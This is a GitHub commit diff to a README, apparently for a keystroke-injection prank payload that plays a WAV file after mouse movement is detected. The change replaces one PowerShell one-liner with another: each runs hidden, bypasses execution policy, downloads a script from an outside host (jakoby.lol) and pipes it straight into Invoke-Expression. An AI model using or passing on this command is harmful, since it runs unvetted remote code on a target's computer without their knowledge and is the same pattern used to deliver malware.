Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:16:27 -06:00 committed by GitHub
parent 24fdf84b3a
commit 6bd2d4e71d
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -39,7 +39,7 @@ After a mouse movement is detected, the WAV file will be played.
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
```
powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex
powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>